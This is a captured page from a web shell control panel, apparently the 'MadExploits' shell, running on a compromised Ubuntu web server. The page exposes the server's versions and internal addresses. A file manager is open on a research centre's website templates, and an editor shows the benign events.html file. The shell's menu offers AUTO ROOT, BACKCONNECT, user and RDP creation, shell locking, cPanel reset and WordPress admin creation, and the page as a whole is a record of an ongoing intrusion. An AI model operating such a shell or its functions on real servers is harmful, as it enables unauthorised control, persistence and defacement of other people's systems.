Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cipd-org-old /
templates /
[ HOME SHELL ]
Name
Size
Permission
Action
about.html
6.19
KB
-rw-r--r--
contactus.html
5.85
KB
-rw-r--r--
desktop.ini
41
B
-rw-r--r--
events.html
3.14
KB
-rw-r--r--
index.html
5.5
KB
-rw-r--r--
joinus.html
4.18
KB
-rw-r--r--
meetourteam.html
5.05
KB
-rw-r--r--
partner.html
3.59
KB
-rw-r--r--
products.html
4.83
KB
-rw-r--r--
services.html
3.59
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : events.html
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Centre for Intelligent Product Development | Turning India into a Product Nation</title> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"> <link rel="stylesheet" href="{{ url_for('static', filename='style.css') }}"> </head> <body> <header> <div class="color-strip"> <img src="{{ url_for('static', filename='MakeInIndia.png') }}" alt="CiPD Make"> </div> <div class="logo6"> <img src="{{ url_for('static', filename='IIIT-Delhilogo.svg') }}" alt="IIIT Delhi Logo"> </div> <div class="logo"> <a href="/"> <img src="{{ url_for('static', filename='CiPDlogo.png') }}" alt="CiPD Logo"> </a> </div> <nav class="homepage-content"> <ul class="homepage"> <li><a href="/partner" onmouseover="animateText(this)">Partners</a></li> <li><a href="/team" onmouseover="animateText(this)">Team</a></li> <li><a href="/join" onmouseover="animateText(this)">JoinUs</a></li> <!-- Add more links as needed --> </ul> </nav> <nav class="right-align"> <ul class="homepage"> <li><a href="/about" onmouseover="animateText(this)">About us</a></li> <li><a href="/service" onmouseover="animateText(this)">Services</a></li> <li><a href="/product" onmouseover="animateText(this)">Product Portfolio</a></li> <li><a href="/event" onmouseover="animateText(this)">Events</a></li> </ul> </nav> </header> <section class="events-section"> <div class="bg"> <video src="{{ url_for('static', filename='bg.mp4') }}" muted autoplay loop ></video> </div> <div class="centered-content"> <h1>STAY TUNED</h1> <h3></h3> <div class="progress-bar"><span></span></div> </div> </section> <!-- Existing Footer Below --> </body> <footer> <div class="footer-content"> <div class="map-container"> <iframe src="https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d14019.183566049558!2d77.2731762!3d28.5458541!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x390ce3e564daac1d%3A0x2c582e340e7bc556!2sIndraprastha%20Institute%20of%20Information%20Technology%20Delhi!5e0!3m2!1sen!2sin!4v1711054108005!5m2!1sen!2sin" width="600" height="450" style="border:0;" allowfullscreen="" loading="lazy" referrerpolicy="no-referrer-when-downgrade"></iframe> </div> <div class="contact-info"> <a href="/contactus">Contact Us</a> <a href="https://iiitd.ac.in/careers/ra">Click to check Available Positions</a> </div> </div> <p>Copyright © 2024 Centre for Intelligent Product Development. All rights reserved.</p> </footer> </html>
Close